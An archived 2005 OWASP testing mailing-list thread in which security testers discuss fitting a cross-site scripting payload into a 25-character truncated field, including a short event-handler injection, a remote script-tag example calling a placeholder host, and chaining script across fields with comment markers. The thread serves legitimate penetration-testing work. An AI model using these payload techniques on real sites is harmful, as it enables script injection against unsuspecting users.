[OWASP-TESTING] Re: [OWASP-Chapters] XSS in 25 characters or less

Jeff Williams jeff.williams at aspectsecurity.com
Thu May 19 21:05:38 EDT 2005


I ran into exactly this issue today. Since it was injecting into a form 
value, I used something like " onfocus=alert() " -- pretty short!

One other cool technique invented (as far as I know) by Bruce Mayhew here is 
to inject a comment start <!-- in one field and a closer in the next 
field -->.  That way you can chain the fields together and your script can 
span fields.

--Jeff

----- Original Message ----- 
From: "Eoin Keary" <eoinkeary at hotmail.com>
To: <daniel.cuthbert at owasp.org>
Cc: <owasp-ireland at lists.sourceforge.net>; 
<owasp-testing at lists.sourceforge.net>; 
<owasp-chapters at lists.sourceforge.net>
Sent: Thursday, May 19, 2005 11:08 AM
Subject: [OWASP-TESTING] Re: [OWASP-Chapters] XSS in 25 characters or less


> Its enforced on the server side as400 box which ie web enabled by "LANSA 
> For the Web".
> Anything over 25 chars is truncated when displayed back to user.
> E
>
>>From: Daniel Cuthbert <daniel.cuthbert at owasp.org>
>>To: Eoin Keary <eoinkeary at hotmail.com>
>>CC: owasp-ireland at lists.sourceforge.net, 
>>owasp-testing at lists.sourceforge.net, owasp-chapters at lists.sourceforge.net
>>Subject: Re: [OWASP-Chapters] XSS in 25 characters or less
>>Date: Thu, 19 May 2005 12:10:09 +0100
>>
>>Interestingly, why have they only restricted it to 25 characters and 
>>where is this being enforced and by what?
>>
>>
>>On 18 May 2005, at 16:22, Eoin Keary wrote:
>>
>>>Hi,
>>>I have a window of 25 chars to perform a XSS exploit.
>>>anything more is truncated by the server.
>>>
>>><script src=http://a.com/z.js></script>
>>>
>>>- this is 39 chars
>>>We can do HTML injection ("<a href=....") to a degree but anyone  any 
>>>ideas on how to execute script in such a small window (25 chars)?
>>>we need to stay in the same domain (xyz.com) inorder to make the  attack 
>>>useful. so redirecting to another domain with the "<a  href..." is no 
>>>good.
>>>
>>>First correct answer gets a pint of Guinness (Larry S, you're not 
>>>included for the pint as I owe you too many).
>>>
>>>Eoin
>>>
>>>_________________________________________________________________
>>>More features, more fun, still absolutely FREE - get Messsenger  7.0! 
>>>http://messenger.msn.co.uk
>>>
>>>
>>>
>>>-------------------------------------------------------
>>>This SF.Net email is sponsored by Oracle Space Sweepstakes
>>>Want to be the first software developer in space?
>>>Enter now for the Oracle Space Sweepstakes!
>>>http://ads.osdn.com/?ad_id=7412&alloc_id=16344&op=click
>>>_______________________________________________
>>>OWASP-Chapters mailing list
>>>OWASP-Chapters at lists.sourceforge.net
>>>https://lists.sourceforge.net/lists/listinfo/owasp-chapters
>>>
>>>
>>
>
> _________________________________________________________________
> More features, more fun, still absolutely FREE - get Messsenger 7.0! 
> http://messenger.msn.co.uk
>
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by Oracle Space Sweepstakes
> Want to be the first software developer in space?
> Enter now for the Oracle Space Sweepstakes!
> http://ads.osdn.com/?ad_id=7412&alloc_id=16344&op=click
> _______________________________________________
> owasp-testing mailing list
> owasp-testing at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-testing 





More information about the Owasp-testing mailing list